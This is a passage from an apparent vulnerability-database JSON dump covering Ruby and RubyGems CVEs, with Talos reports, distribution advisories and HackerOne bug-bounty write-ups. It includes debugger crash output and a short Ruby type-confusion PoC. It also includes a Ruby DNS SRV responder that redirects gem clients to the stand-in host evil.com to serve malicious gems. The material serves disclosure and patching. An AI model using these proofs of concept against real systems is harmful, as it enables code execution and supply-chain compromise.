(first chance)\n eax=02b81b48 ebx=02b81b58 ecx=77b2f861 edx=0028f871 esi=02b81b48 edi=00000008\n eip=77b9087c esp=0028fab8 ebp=0028fab8 iopl=0 nv up ei pl nz na po nc\n cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202\n ntdll!RtlpBreakPointHeap+0x23:\n 77b9087c cc int 3\n 0:000> g\n HEAP[ruby.exe]: Invalid address specified to RtlFreeHeap( 00510000, 02B81B50 )\n (15dc.16b8): Break instruction exception - code 80000003 (first chance)\n eax=02b81b48 ebx=02b81b48 ecx=77b2f861 edx=0028f88d esi=00510000 edi=00510000\n eip=77b9087c esp=0028fad4 ebp=0028fad4 iopl=0 nv up ei pl nz na po nc\n cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202\n ntdll!RtlpBreakPointHeap+0x23:\n 77b9087c cc int 3\n 0:000> g\n eax=00000000 ebx=00000000 ecx=0028f88c edx=0028f88d esi=77bc2100 edi=77bc20c0\n eip=77adfd0e esp=0028fe40 ebp=0028fe5c iopl=0 nv up ei pl zr na pe nc\n cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246\n ntdll!ZwTerminateProcess+0x12:\n 77adfd0e 83c404 add esp,4\n 0:000>\n \n\n### TIMELINE\n\n2015-06-11 - Initial Discovery \n2015-06-30 - Vendor Notification \n2016-06-14 - Public Disclosure \n\n\n##### Credit\n\nDiscovered by Marcin \u2018Icewall\u2019 Noga of Cisco Talos\n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2016-0152\n\nPrevious Report\n\nTALOS-2016-0033\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-06-14T00:00:00", "type": "talos", "title": "Ruby Fiddle::Function.new Heap Overflow Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2339"], "modified": "2016-06-14T00:00:00", "id": "TALOS-2016-0034", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2016-0034", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-03T15:23:57", "description": "# Talos Vulnerability Report\n\n### TALOS-2016-0031\n\n## Ruby TclTkIp ip_cancel_eval Type Confusion Vulnerabilities\n\n##### June 14, 2016\n\n##### CVE Number\n\nCVE-2016-2337\n\n### DESCRIPTION\n\nType Confusion exists in _cancel_eval Ruby\u2019s TclTkIp class method. Attacker passing different type of object than String as \u201cretval\u201d argument can cause arbitrary code execution.\n\n### TESTED VERSIONS\n\nRuby 2.3.0 dev Ruby 2.2.2 Tcl/Tk8.6 or later\n\n### PRODUCT URLs\n\nhttps://www.ruby-lang.org\n\n### DETAILS\n\nVulnerable code:\n \n \n ---------------------------------------------- code \n ---------------------------------------------\t\n Line 7761\tstatic VALUE\n Line 7762\tip_cancel_eval(argc, argv, self)\n Line 7763\tint argc;\n Line 7764\tVALUE *argv;\n Line 7765\tVALUE self;\n Line 7766\t{\n Line 7767\t\tVALUE retval;\n Line 7768\n Line 7769\t\tif (rb_scan_args(argc, argv, \"01\", &retval) == 0) {\n Line 7770\t\t\tretval = Qnil;\n Line 7771\t\t}\n Line 7772\t\tif (ip_cancel_eval_core(get_ip(self)->ip, retval, 0) == \n TCL_OK) {\n Line 7773\t\t\treturn Qtrue;\n Line 7774\t\t} else {\n Line 7775\t\t\treturn Qfalse;\n Line 7776\t\t}\n Line 7777\t}\n \n Line 7736\tstatic int\n Line 7737\tip_cancel_eval_core(interp, msg, flag)\n Line 7738\tTcl_Interp *interp;\n Line 7739\tVALUE msg;\n Line 7740\tint flag;\n Line 7741\t{\n Line 7742\t#if TCL_MAJOR_VERSION < 8 || (TCL_MAJOR_VERSION == 8 && \n TCL_MINOR_VERSION < 6)\n Line 7743\t\trb_raise(rb_eNotImpError,\n Line 7744\t\t\t\t \"cancel_eval is supported Tcl/Tk8.6 or \n later.\");\n Line 7745\n Line 7746\t\tUNREACHABLE;\n Line 7747\t#else\n Line 7748\t\tTcl_Obj *msg_obj;\n Line 7749\n Line 7750\t\tif (NIL_P(msg)) {\n Line 7751\t\t\tmsg_obj = NULL;\n Line 7752\t\t} else {\n Line 7753\t\t\tmsg_obj = Tcl_NewStringObj(RSTRING_PTR(msg), \n RSTRING_LEN(msg));\n Line 7754\t\t\tTcl_IncrRefCount(msg_obj);\n Line 7755\t\t}\n Line 7756\n Line 7757\t\treturn Tcl_CancelEval(interp, msg_obj, 0, flag);\n Line 7758\t#endif\n Line 7759\t}\n ---------------------------------------------- code \n ---------------------------------------------\t\n \n\nIn line 7769 \u201c_cancel_eval\u201d method argument is parse out into \u201cretval\u201d variable. Next this variable is passed to \u201cip_cancel_eval_core\u201d function (line 7772). In line 7753 we can see that our \u201cretval\u201d variable which in this function is passed as \u201cmsg\u201d argument is treated as String object.Passing object different than String we will cause type confusion vulnerability in this line.\n\n### POC\n \n \n ---------------------------------- PoC test.rb ----------------------------------------\n \n require 'tk'\n t = TclTkIp.new()\n t._cancel_eval(0x11223344)\n \n ---------------------------------- PoC test.rb ----------------------------------------\n \n\n### TIMELINE\n\n2015-06-18 - Initial Discovery \n2015-06-30 - Vendor Notification \n2016\u201406-14 - Public Disclosure \n\n\n##### Credit\n\nDiscovered by Marcin \u2018Icewall\u2019 Noga of Cisco Talos\n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2016-0032\n\nPrevious Report\n\nTALOS-2016-0029\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-06-14T00:00:00", "type": "talos", "title": "Ruby TclTkIp ip_cancel_eval Type Confusion Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2337"], "modified": "2016-06-14T00:00:00", "id": "TALOS-2016-0031", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2016-0031", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "suse": [{"lastseen": "2017-04-28T17:19:07", "description": "This ruby2.1 update to version 2.1.9 fixes the following issues:\n\n Security issues fixed:\n - CVE-2016-2339: heap overflow vulnerability in the\n Fiddle::Function.new"initialize" (bsc#1018808)\n - CVE-2015-7551: Unsafe tainted string usage in Fiddle and DL (bsc#959495)\n - CVE-2015-3900: hostname validation does not work when fetching gems or\n making API requests (bsc#936032)\n - CVE-2015-1855: Ruby'a OpenSSL extension suffers a vulnerability through\n overly permissive matching of hostnames (bsc#926974)\n - CVE-2014-4975: off-by-one stack-based buffer overflow in the encodes()\n function (bsc#887877)\n\n Bugfixes:\n - SUSEconnect doesn't handle domain wildcards in no_proxy environment\n variable properly (bsc#1014863)\n - Segmentation fault after pack & ioctl & unpack (bsc#909695)\n - Ruby:HTTP Header injection in 'net/http' (bsc#986630)\n\n ChangeLog:\n - <a rel=\"nofollow\" href=\"http://svn.ruby-lang.org/repos/ruby/tags/v2_1_9/ChangeLog\">http://svn.ruby-lang.org/repos/ruby/tags/v2_1_9/ChangeLog</a>\n\n This update was imported from the SUSE:SLE-12:Update update project.\n\n", "cvss3": {}, "published": "2017-04-28T18:11:28", "type": "suse", "title": "Security update for ruby2.1 (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2015-3900", "CVE-2015-1855", "CVE-2016-2339", "CVE-2015-7551", "CVE-2014-4975"], "modified": "2017-04-28T18:11:28", "id": "OPENSUSE-SU-2017:1128-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-04/msg00034.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-20T11:18:41", "description": "This ruby2.1 update to version 2.1.9 fixes the following issues:\n\n Security issues fixed:\n - CVE-2016-2339: heap overflow vulnerability in the\n Fiddle::Function.new"initialize" (bsc#1018808)\n - CVE-2015-7551: Unsafe tainted string usage in Fiddle and DL (bsc#959495)\n - CVE-2015-3900: hostname validation does not work when fetching gems or\n making API requests (bsc#936032)\n - CVE-2015-1855: Ruby'a OpenSSL extension suffers a vulnerability through\n overly permissive matching of hostnames (bsc#926974)\n - CVE-2014-4975: off-by-one stack-based buffer overflow in the encodes()\n function (bsc#887877)\n\n Bugfixes:\n - SUSEconnect doesn't handle domain wildcards in no_proxy environment\n variable properly (bsc#1014863)\n - Segmentation fault after pack & ioctl & unpack (bsc#909695)\n - Ruby:HTTP Header injection in 'net/http' (bsc#986630)\n\n ChangeLog:\n - <a rel=\"nofollow\" href=\"http://svn.ruby-lang.org/repos/ruby/tags/v2_1_9/ChangeLog\">http://svn.ruby-lang.org/repos/ruby/tags/v2_1_9/ChangeLog</a>\n\n", "cvss3": {}, "published": "2017-04-20T12:08:57", "type": "suse", "title": "Security update for ruby2.1 (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2015-3900", "CVE-2015-1855", "CVE-2016-2339", "CVE-2015-7551", "CVE-2014-4975"], "modified": "2017-04-20T12:08:57", "id": "SUSE-SU-2017:1067-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-04/msg00024.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-03T19:17:43", "description": "This update for ruby19 fixes the following issues:\n\n Security issue fixed:\n - CVE-2016-2339: heap overflow vulnerability in the\n Fiddle::Function.new"initialize" (bsc#1018808)\n\n Bugfixes:\n - fix small mistake in the backport for (bsc#986630)\n - HTTP Header injection in 'net/http' (bsc#986630)\n - make the testsuite work with our new openssl requirements\n\n", "cvss3": {}, "published": "2017-04-03T21:09:44", "type": "suse", "title": "Security update for ruby19 (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2016-2339"], "modified": "2017-04-03T21:09:44", "id": "SUSE-SU-2017:0914-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-04/msg00006.html", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:LOW/I:LOW/A:LOW/"}}, {"lastseen": "2017-04-05T13:17:48", "description": "This update for ruby2.2, ruby2.3 fixes the following issues:\n\n Security issues fixed:\n - CVE-2016-2339: heap overflow vulnerability in the\n Fiddle::Function.new"initialize" (boo#1018808)\n - CVE-2015-7551: Unsafe tainted string usage in Fiddle and DL (boo#959495)\n\n Detailed ChangeLog:\n - <a rel=\"nofollow\" href=\"http://svn.ruby-lang.org/repos/ruby/tags/v2_2_6/ChangeLog\">http://svn.ruby-lang.org/repos/ruby/tags/v2_2_6/ChangeLog</a>\n - <a rel=\"nofollow\" href=\"http://svn.ruby-lang.org/repos/ruby/tags/v2_3_3/ChangeLog\">http://svn.ruby-lang.org/repos/ruby/tags/v2_3_3/ChangeLog</a>\n\n", "cvss3": {}, "published": "2017-04-05T15:08:17", "type": "suse", "title": "Security update for ruby2.2, ruby2.3 (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2016-2339", "CVE-2015-7551"], "modified": "2017-04-05T15:08:17", "id": "OPENSUSE-SU-2017:0933-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-04/msg00007.html", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:LOW/I:LOW/A:LOW/"}}], "debiancve": [{"lastseen": "2021-12-14T17:52:31", "description": "Type confusion exists in _cancel_eval Ruby's TclTkIp class method. Attacker passing different type of object than String as \"retval\" argument can cause arbitrary code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-01-06T21:59:00", "type": "debiancve", "title": "CVE-2016-2337", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2337"], "modified": "2017-01-06T21:59:00", "id": "DEBIANCVE:CVE-2016-2337", "href": "https://security-tracker.debian.org/tracker/CVE-2016-2337", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-14T17:52:31", "description": "An exploitable heap overflow vulnerability exists in the Fiddle::Function.new \"initialize\" function functionality of Ruby. In Fiddle::Function.new \"initialize\" heap buffer \"arg_types\" allocation is made based on args array length. Specially constructed object passed as element of args array can increase this array size after mentioned allocation and cause heap overflow.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-01-06T21:59:00", "type": "debiancve", "title": "CVE-2016-2339", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2339"], "modified": "2017-01-06T21:59:00", "id": "DEBIANCVE:CVE-2016-2339", "href": "https://security-tracker.debian.org/tracker/CVE-2016-2339", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-09-22T01:58:34", "description": "RubyGems 2.0.x before 2.0.16, 2.2.x before 2.2.4, and 2.4.x before 2.4.7 does not validate the hostname when fetching gems or making API requests, which allows remote attackers to redirect requests to arbitrary domains via a crafted DNS SRV record, aka a \"DNS hijack attack.\"", "cvss3": {}, "published": "2015-06-24T14:59:00", "type": "debiancve", "title": "CVE-2015-3900", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3900"], "modified": "2015-06-24T14:59:00", "id": "DEBIANCVE:CVE-2015-3900", "href": "https://security-tracker.debian.org/tracker/CVE-2015-3900", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-09-16T22:37:08", "description": "RubyGems 2.0.x before 2.0.17, 2.2.x before 2.2.5, and 2.4.x before 2.4.8 does not validate the hostname when fetching gems or making API requests, which allows remote attackers to redirect requests to arbitrary domains via a crafted DNS SRV record with a domain that is suffixed with the original domain name, aka a \"DNS hijack attack.\" NOTE: this vulnerability exists because to an incomplete fix for CVE-2015-3900.", "cvss3": {}, "published": "2015-08-25T17:59:00", "type": "debiancve", "title": "CVE-2015-4020", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3900", "CVE-2015-4020"], "modified": "2015-08-25T17:59:00", "id": "DEBIANCVE:CVE-2015-4020", "href": "https://security-tracker.debian.org/tracker/CVE-2015-4020", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "fedora": [{"lastseen": "2020-12-21T08:17:53", "description": "RubyGems is the Ruby standard for publishing and managing third party libraries. ", "cvss3": {}, "published": "2015-08-11T02:06:59", "type": "fedora", "title": "[SECURITY] Fedora 22 Update: rubygems-2.4.8-100.fc22", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3900"], "modified": "2015-08-11T02:06:59", "id": "FEDORA:0FC496087B07", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/JGCFID4WQLY54U45Y244GHRRBLMZCWHH/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-12-21T08:17:53", "description": "RubyGems is the Ruby standard for publishing and managing third party libraries. ", "cvss3": {}, "published": "2015-08-19T08:17:15", "type": "fedora", "title": "[SECURITY] Fedora 21 Update: rubygems-2.2.5-100.fc21", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3900"], "modified": "2015-08-19T08:17:15", "id": "FEDORA:4A0D661A5EC1", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/SIV3IWPXRK4PXKEI3KJGDGFRBB43WM4M/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-12-21T08:17:53", "description": "RubyGems is the Ruby standard for publishing and managing third party libraries. ", "cvss3": {}, "published": "2015-08-10T10:06:28", "type": "fedora", "title": "[SECURITY] Fedora 23 Update: rubygems-2.4.8-100.fc23", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3900"], "modified": "2015-08-10T10:06:28", "id": "FEDORA:B90ED608757D", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/CKGU7HSXPWYLG53X4GRRZHM5MWPE3AP2/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "redhat": [{"lastseen": "2023-05-26T02:21:32", "description": "Ruby is an extensible, interpreted, object-oriented, scripting language.\nIt has features to process text files and to perform system management\ntasks.\n\nA flaw was found in a way rubygems verified the API endpoint hostname\nretrieved through a DNS SRV record. A man-in-the-middle attacker could use\nthis flaw to force a client to download content from an untrusted domain.\n(CVE-2015-3900)\n\nAll rh-ruby22-ruby users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue. All running\ninstances of Ruby need to be restarted for this update to take effect.\n", "cvss3": {}, "published": "2015-08-24T00:00:00", "type": "redhat", "title": "(RHSA-2015:1657) Important: rh-ruby22-ruby security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3900"], "modified": "2018-06-12T21:28:16", "id": "RHSA-2015:1657", "href": "https://access.redhat.com/errata/RHSA-2015:1657", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "hackerone": [{"lastseen": "2023-09-03T23:36:50", "bounty": 0.0, "description": "https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-007/?fid=6356", "cvss3": {}, "published": "2015-05-06T00:00:00", "type": "hackerone", "title": "RubyGems: Request Hijacking Vulnerability In RubyGems 2.4.6 And Earlier", "bulletinFamily": "bugbounty", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3900"], "modified": "2015-05-14T00:00:00", "id": "H1:103993", "href": "https://hackerone.com/reports/103993", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-09-03T22:02:33", "bounty": 0.0, "description": "**Description:**\n\nThe RubyGems client supports a gem server API discovery functionality,\nwhich is used when pushing or pulling gems to a gem distribution/hosting\nserver, like RubyGems.org. This functionality is provided via a SRV DNS\nrequest to the users gem source hostname prepended with \"_rubygems._tcp.\".\nThe response to this request tells the RubyGems client (aka: the gem\ncommand) where the users gem server API is. In the default RubyGems\nscenario, with a gem source of https://rubygems.org, the users SRV DNS\nrequest and reply will look like this:\n\n ~ $ dig srv _rubygems._tcp.rubygems.org +short\n 0 1 80 api.rubygems.org.\n\nDue to a deficiency in DNS response verification, a MiTM positioned \nattacker can poison the DNS response to this record response and force\nthe client to unknowingly download and install Ruby gems from an attacker\ncontrolled gem server in an alternate security domain. An example of\nsuch a scenario would look like so:\n\n ~ $ dig _rubygems._tcp.rubygems.org SRV +short\n 0 0 53 evil.com/api.rubygems.com.\n\nIn such a scenario, the attacker is able to serve the client malicious gem\ncontent, resulting in trivial remote code execution scenarios. For\nexample, the attacker could simply modify the gem source code and trigger\ncode execution via the extensions API at install time on the client machine\n(a gem trojaning technique described by Ben Smith in his \"Hacking with\nGems\" presentation at Aloha Ruby Conference in 2012 -\nhttps://www.youtube.com/watch?v=z-5bO0Q1J9s)/\n\nThis vulnerability has the same net effect/impact as [CVE-2015-3900](https://nvd.nist.gov/vuln/detail/CVE-2015-3900) and\n[CVE-2015-4020](https://nvd.nist.gov/vuln/detail/CVE-2015-4020).\n\n**Affected method in Gem::RemoteFetcher:**\n\nhttps://github.com/rubygems/rubygems/blob/5096fa35c1ca3e0a7d175aaf9d77cd93114fd977/lib/rubygems/remote_fetcher.rb#L101-L119\n\n**PoC DNS SRV Responder:**\n\n #!/usr/bin/env ruby\n require 'rubydns'\n require 'rubydns/system'\n INTERFACES = [\n \t[:udp, \"0.0.0.0\", 53],\n \t[:tcp, \"0.0.0.0\", 53]\n ]\n Name = Resolv::DNS::Name\n IN = Resolv::DNS::Resource::IN\t\n RubyDNS::run_server(:listen => INTERFACES) do\n match(//, IN::SRV) do |transaction|\n transaction.respond!(0,0,53,\"evil.com/api.rubygems.com\")\n end\n end\n\n**Recommendations:**\n\nConsider this small patch to address the immediate attack vector...\n\n - if /\\.#{Regexp.quote(host)}\\z/ =~ target\n + if (/\\.#{Regexp.quote(host)}\\z/ =~ target) && !target.include?(\"/\")\n\nAlso, consider moving away from doing API discovery via DNS. Would recommend \nmoving to HTTPS, where you will have a stronger transport security chain.\n\n**References (these are not new, just references prior work here to help triage team understand impact):**\n\n- https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-007/?fid=6356\n- https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-009/?fid=6478\n- https://speakerdeck.com/claudijd/trojaned-gems-you-cant-tell-youre-using-one\n- http://blog.rubygems.org/2015/05/14/CVE-2015-3900.html", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-04-02T17:31:05", "type": "hackerone", "title": "RubyGems: Request Hijacking Vulnerability in RubyGems 2.6.11 and earlier", "bulletinFamily": "bugbounty", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3900", "CVE-2015-4020", "CVE-2017-0902"], "modified": "2017-08-30T23:36:42", "id": "H1:218088", "href": "https://hackerone.com/reports/218088", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "osv": [{"lastseen": "2023-08-25T22:51:00", "description": "RubyGems 2.0.x before 2.0.16, 2.2.x before 2.2.4, and 2.4.x before 2.4.7 does not validate the hostname when fetching gems or making API requests, which allows remote attackers to redirect requests to arbitrary domains via a crafted DNS SRV record, aka a \"DNS hijack attack.\"", "cvss3": {}, "published": "2022-05-14T01:08:49", "type": "osv", "title": "RubyGems vulnerable to DNS hijack attack", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": 